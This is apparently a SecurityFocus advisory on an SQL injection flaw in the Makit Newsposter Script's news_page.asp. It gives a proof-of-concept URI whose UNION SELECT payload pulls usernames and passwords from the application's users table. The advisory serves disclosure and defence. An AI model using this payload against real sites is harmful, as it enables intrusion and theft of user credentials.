Makit Newsposter Script News_Page.ASP SQL Injection Vulnerability

Attackers can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/news_page.asp?uid=-1'%20union%20select%200,0,0,uname,pword,0,0,0%20from%20users%20where%20'1=1


 

Privacy Statement
Copyright 2010, SecurityFocus